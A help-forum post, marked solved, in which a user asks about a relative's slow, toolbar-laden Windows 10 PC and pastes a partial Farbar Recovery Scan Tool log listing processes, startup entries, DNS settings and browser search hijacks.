Solved Will my brother in law ever learn?

[glhglh]

Lots of slowness and lots of toolbars installed.

Frst 1:
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 10-02-2017
Ran by Randy (administrator) on HP-RRR (10-02-2017 21:47:09)
Running from C:\Users\Randy\Desktop\Virus
Loaded Profiles: Randy (Available Profiles: Randy & DefaultAppPool)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(SpeedyPC Software) C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe
(Digital Care Solutions) C:\Program Files\BDServices\BitDefenderCOM.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(SlimWare Utilities, Inc.) C:\Program Files\SlimService\SlimServiceFactory.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(SlimWare Utilities, Inc.) C:\Program Files\SlimService\SlimService.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(SlimWare Utilities, Inc.) C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP OfficeJet 3830 series\Bin\ScanToPCActivationApp.exe
(The Chromium Authors) C:\Users\Randy\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Randy\AppData\Local\Chromium\Application\chrome.exe
(Slimware Utilities Holdings, Inc.) C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(AOL Inc.) C:\Program Files (x86)\Common Files\AOL\1454013173\ee\aolsoftware.exe
() C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
(The Chromium Authors) C:\Users\Randy\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Randy\AppData\Local\Chromium\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
() C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
() C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
() C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
() C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe
(The Chromium Authors) C:\Users\Randy\AppData\Local\Chromium\Application\chrome.exe
(Adobe Systems Incorporated) C:\Config.Msi\cfaec5f2.rbf
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\Install\{27B1DC9B-40FD-4489-AE63-D0E163D5D7FC}\56.0.2924.87_chrome_installer.exe
(Google Inc.) C:\Windows\Temp\CR_58E4E.tmp\setup.exe
(Google Inc.) C:\Windows\Temp\CR_58E4E.tmp\setup.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP OfficeJet 3830 series\Bin\HPNetworkCommunicatorCom.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-01-04] (IDT, Inc.)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [800416 2012-01-19] (Atheros Commnucations)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954352 2016-04-27] (Synaptics Incorporated)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [576568 2011-11-29] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-19] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1342008 2011-08-26] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [HostManager] => C:\Program Files (x86)\Common Files\AOL\1454013173\ee\AOLSoftware.exe [41800 2010-03-07] (AOL Inc.)
HKLM-x32\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [913920 2016-01-04] () <===== ATTENTION
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1160408 2016-12-17] (Adobe Systems Incorporated)
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\Run: [HP OfficeJet 3830 series (NET)] => C:\Program Files\HP\HP OfficeJet 3830 series\Bin\ScanToPCActivationApp.exe [3651080 2015-03-09] (Hewlett-Packard Development Company, LP)
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [913920 2016-01-04] () <===== ATTENTION
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\Run: [Chromium] => c:\users\randy\appdata\local\chromium\application\chrome.exe [1043456 2016-01-26] (The Chromium Authors)
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\Run: [SlimCleaner Plus] => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe [26201280 2016-07-25] (Slimware Utilities Holdings, Inc.)
ShellIconOverlayIdentifiers: [ CustomFolderNotSynced] -> {4008A679-BE48-456D-A32E-97DE3F48E10D} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ CustomFolderSynced] -> {4DD1429E-055B-4585-9E4D-614252FD7FC1} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FileNotSynced] -> {267973DC-2B3C-41CE-93F1-D2C5CCC06663} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FileSynced] -> {DBD42211-56CD-4C08-A3E4-48ED07AD7759} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderExcluded] -> {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderNotSynced] -> {3E2576B1-5B08-47DE-8803-95C6ECA734EE} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderSynced] -> {2858A960-566F-45CF-951E-4B3099E70E6F} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ CustomFolderNotSynced] -> {4008A679-BE48-456D-A32E-97DE3F48E10D} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ CustomFolderSynced] -> {4DD1429E-055B-4585-9E4D-614252FD7FC1} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ FileNotSynced] -> {267973DC-2B3C-41CE-93F1-D2C5CCC06663} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ FileSynced] -> {DBD42211-56CD-4C08-A3E4-48ED07AD7759} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ FolderExcluded] -> {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ FolderNotSynced] -> {3E2576B1-5B08-47DE-8803-95C6ECA734EE} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ FolderSynced] -> {2858A960-566F-45CF-951E-4B3099E70E6F} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Event Reminder.lnk [2015-12-11]
ShortcutTarget: Event Reminder.lnk -> C:\Program Files (x86)\Broderbund\PrintMaster\pmremind.exe (Broderbund Properties LLC)
Startup: C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutorunsDisabled [2016-02-02] ()
Startup: C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JZIP.lnk [2015-12-11]
ShortcutTarget: JZIP.lnk -> C:\Windows\System32\schtasks.exe (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 127.0.0.1 localhost
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{21464931-263a-4a60-930e-a79b690b399f}: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{21464931-263a-4a60-930e-a79b690b399f}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{31ea90e4-35d4-4540-a94c-eab28ac7c7e0}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{3973625b-d550-4482-8626-055c851fa7f8}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{3e5366e2-e619-4c7e-a254-4148181480bb}: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{3e5366e2-e619-4c7e-a254-4148181480bb}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{797fc918-2a02-4a5f-9f81-cc4932956ea0}: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{797fc918-2a02-4a5f-9f81-cc4932956ea0}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{825E0274-4ABB-4A35-83B7-62488622A3B1}: [NameServer] 8.8.8.8 8.8.4.4
Tcpip\..\Interfaces\{a1c95c13-acd4-4e93-88c9-2912fbc94e6c}: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{a1c95c13-acd4-4e93-88c9-2912fbc94e6c}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{c1fd1c83-dc19-4fbd-a13f-ebdcb53d58b0}: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{c1fd1c83-dc19-4fbd-a13f-ebdcb53d58b0}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{ed4e3568-60c7-4154-bc8c-83374c0e6f1c}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131312655671564010&GUID=F34706C8-BC86-441C-8A8D-ECA6761F344B
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131312655672036951&GUID=F34706C8-BC86-441C-8A8D-ECA6761F344B
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131312655672053665&GUID=F34706C8-BC86-441C-8A8D-ECA6761F344B
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM-x32 -> {77F8667C-BC7F-4CCB-B5BD-96659BD2F0DE} URL = hxxp://search.aol.com/aol/search?q={searchTerms}&s_it=clireset-ie
SearchScopes: HKLM-x32 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^YYA^us&si=CP6fnartpMoCFc5bfgodIZsNCA&ptb=5EEB6E1C-093A-40CF-A501-0BE772DDE2B1&ind=2016011213&n=7829e3cd&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> {1B687A8D-64D5-4CAD-B865-D4512F4B23DD} URL = hxxp://search.aol.com/aol/search?q={searchTerms}&s_it=clireset-ie
SearchScopes: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^YYA^us&si=CP6fnartpMoCFc5bfgodIZsNCA&ptb=5EEB6E1C-093A-40CF-A501-0BE772DDE2B1&ind=2016011213&n=7829e3cd&psa=&st=sb&searchfor={searchTerms}
BHO: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files\AMD\SteadyVideo\SteadyVideo.dll [2011-06-08] (Advanced Micro Devices)
BHO-x32: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files (x86)\amd\SteadyVideo\SteadyVideo.dll [2011-06-08] (Advanced Micro Devices)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-01-19] (Atheros Commnucations)
Toolbar: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)

FireFox:
========
FF ProfilePath: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default [2016-08-08]
FF user.js: detected! => C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\user.js [2016-01-28]
FF Homepage: Mozilla\Firefox\Profiles\w1n6vmjf.default -> hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_instlmtrx_16_07&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyByE0EyDyEtAtBtA0D0C0E0Azz0E0AyEtN0D0Tzu0StCyDtDyCtN1L2XzutAtFtCzztFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDyEzz0DyDzy0B0FtGyD0E0CyDtGzytA0BtCtGtAtC0E0AtG0CyB0D0AtC0ByByCzytCyEyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAyC0F0ByByD0EtG0BtAtDzytGyE0F0DyCtGzyyD0C0EtGzzzz0EtCyByDyByCyBtByE0D2QtN0A0LzutB%26cr%3D1936506275%26a%3Dwncy_instlmtrx_16_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\w1n6vmjf.default -> Search Provided by Yahoo
FF Keyword.URL: Mozilla\Firefox\Profiles\w1n6vmjf.default -> hxxp://aolsearch.aol.com/aol/search?invocationType=client_searchbox&query=
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\w1n6vmjf.default -> Search Provided by Yahoo
FF NewTab: Mozilla\Firefox\Profiles\w1n6vmjf.default -> about:newtab
FF Extension: (videoresumerjetpack) - C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\Extensions\videoresumer@jetpack [2015-12-11] [not signed]
FF Extension: (Yahoo! Toolbar) - C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\Extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1} [2016-01-04] [not signed]
FF Extension: (AOL Toolbar) - C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\Extensions\{7affbfae-c4e2-4915-8c0f-00fa3ec610a1} [2016-01-28] [not signed]
FF SearchPlugin: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\searchplugins\aolsearch.xml [2015-12-15]
FF SearchPlugin: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\searchplugins\Search Provided by Yahoo.xml [2016-02-15]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\aolsearch.xml [2015-12-15]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2011-11-07] (Adobe Systems, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-02-10] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-02-10] (Google Inc.)
FF Plugin-x32: @viewpoint.com/VMP -> C:\Program Files (x86)\Viewpoint\Viewpoint Experience Technology\npViewpoint.dll [2004-02-20] ()
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-12-17] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2783097096-289569773-1546617986-1001: bluejeans.com/bjninstallplugin -> C:\Users\Randy\AppData\Roaming\Blue Jeans\bjnplugin\2.115.57.5\npbjninstallplugin_2.115.57.5.dll [2015-10-15] (Blue Jeans)
FF Plugin HKU\S-1-5-21-2783097096-289569773-1546617986-1001: bluejeans.com/bjnplugin -> C:\Users\Randy\AppData\Roaming\Blue Jeans\bjnplugin\2.115.57.5\npbjnplugin_2.115.57.5.dll [2015-10-15] (Blue Jeans)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2016-12-17] (Adobe Systems Inc.)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\prefs.js [2015-12-11] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\cfg [2015-12-11] <==== ATTENTION

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxps://us.search.yahoo.com/yhs/web?hspart=omr&hsimp=yhs-001&type=86311316&param1=y6bdVFVIsvuYsgEClQfz8HyFH9tZCHsOZFHNP%2BYwJC1YN8j239I6Mjyd7vNuRVuF4vDPXvI545K5Lk0yZuaPTEZETNhOb%2FBJMlU3cWrtE3B5LPuATRj4TiQDTLE5W%2F6T1gG3gr%2B63Fuf4DJw3bmxC%2BZWeGECWX8xosk8oaYOJhVzfdn7C0MU8tFOhlX0D867I7w%2FY3BPKDl2YWznSMNnMNhdfhuhn%2BhoVJITdlVyN5g%3D
CHR StartupUrls: Default -> "hxxps://us.search.yahoo.com/yhs/web?hspart=omr&hsimp=yhs-001&type=86311316&param1=y6bdVFVIsvuYsgEClQfz8HyFH9tZCHsOZFHNP%2BYwJC1YN8j239I6Mjyd7vNuRVuFhCJrEQv%2Fc%2BX2qZcHHjPPs%2Bq5PxEnDevcjOXYLyIHaBnM0IoJ8MqMcKnm8tCbPzRbgJMRuO8J430v3e4Ts%2F%2BpSpNuZ2wz8ISRKpXfOt2Mn1ECKZer7C78v27A4TWru%2BOJphUGzd3uNG%2Bbj9taw10baItFUSSmTPZfB91iIJ4NZHs%3D","hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_instlmtrx_16_07&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyByE0EyDyEtAtBtA0D0C0E0Azz0E0AyEtN0D0Tzu0StCyDtDyCtN1L2XzutAtFtCzztFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDyEzz0DyDzy0B0FtGyD0E0CyDtGzytA0BtCtGtAtC0E0AtG0CyB0D0AtC0ByByCzytCyEyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAyC0F0ByByD0EtG0BtAtDzytGyE0F0DyCtGzyyD0C0EtGzzzz0EtCyByDyByCyBtByE0D2QtN0A0LzutB%26cr%3D1936506275%26a%3Dwncy_instlmtrx_16_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome"
CHR DefaultSearchURL: Default -> hxxps://us.search.yahoo.com/yhs/search?hspart=omr&hsimp=yhs-001&type=86311316&param1=y6bdVFVIsvuYsgEClQfz8HyFH9tZCHsOZFHNP%2BYwJC1YN8j239I6Mjyd7vNuRVuF%2BSx9IQO%2Btq1ES3xDVIbRnGPfSeuBJV3RjakyiaTUMyic9cEOZz%2BIMAEXlTGw29QZ8O%2BMT2WbP3ntbUpNhkYAiDSvZVBLYjw6TmKit75VvKwgkCE5sGqaHpFG3bnw81er2LsvJrXoUWjpc3z21x5IKcuu7XPn1%2FeTgH5tz0ptHRU%3D&p={searchTerms}
CHR DefaultSearchKeyword: Default -> search.yahoo.com
CHR DefaultNewTabURL: Default -> hxxps://us.search.yahoo.com/yhs/web?hspart=omr&hsimp=yhs-001&type=86311316&param1=y6bdVFVIsvuYsgEClQfz8HyFH9tZCHsOZFHNP%2BYwJC1YN8j239I6Mjyd7vNuRVuF9CWpdq8%2BWMi2ZHXIPXjQavHclM9j1Ab9UVxxrvumLdV%2BHCMXZufzoRPgqvEu%2BSX%2BVjLy6NdvJS4GO4EhWobrp%2BCPE5Ncg5ey6jMngZaMQCh%2BAmhFzEwpL1%2F33kJ7fiGTyGwEETEUxfbQHs30Lj1Pcjs8sJdvhGspUs%2FhtFiexxQ%3D
CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command={searchTerms}
CHR Profile: C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default [2016-08-08]
CHR Extension: (Google Docs) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-30]
CHR Extension: (Google Drive) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-30]
CHR Extension: (YouTube) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-30]
CHR Extension: (Google Search) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-30]
CHR Extension: (Google Docs Offline) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-08-06]
CHR Extension: (Home Tab) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\kofkpgiaknijknhajbhnghkodiccblkg [2016-08-06]
